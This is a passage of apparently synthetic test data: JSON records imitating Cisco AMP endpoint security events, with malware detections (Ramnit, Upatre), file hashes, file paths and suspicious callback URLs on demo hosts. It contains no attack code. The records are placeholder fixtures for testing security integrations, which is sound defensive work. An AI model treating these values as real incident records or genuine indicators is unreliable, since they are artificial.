malware","event_type_id":1107296272,"detection":"W32.Ramnit.A","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704833,"start_date":"2021-01-15T10:00:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://benhomelandefit.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":132000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232643","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":542000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671500","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":526000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671499","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":370000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671498","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":261000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":214000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671496","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663807451562000,"timestamp":1610704833,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663807451561998","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://sovereutilizeignty.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":835000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265345","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":918000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":871000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":824000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704197","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":793000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704196","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":684000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704195","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":704000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594701","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":611000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594700","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707312705798000,"timestamp":1610704830,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:00:30+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1264,"scanned_processes":21,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899742001000,"timestamp":1610704828,"timestamp_nanoseconds":742000000,"date":"2021-01-15T10:00:28+00:00","event_type":"Microsoft Word 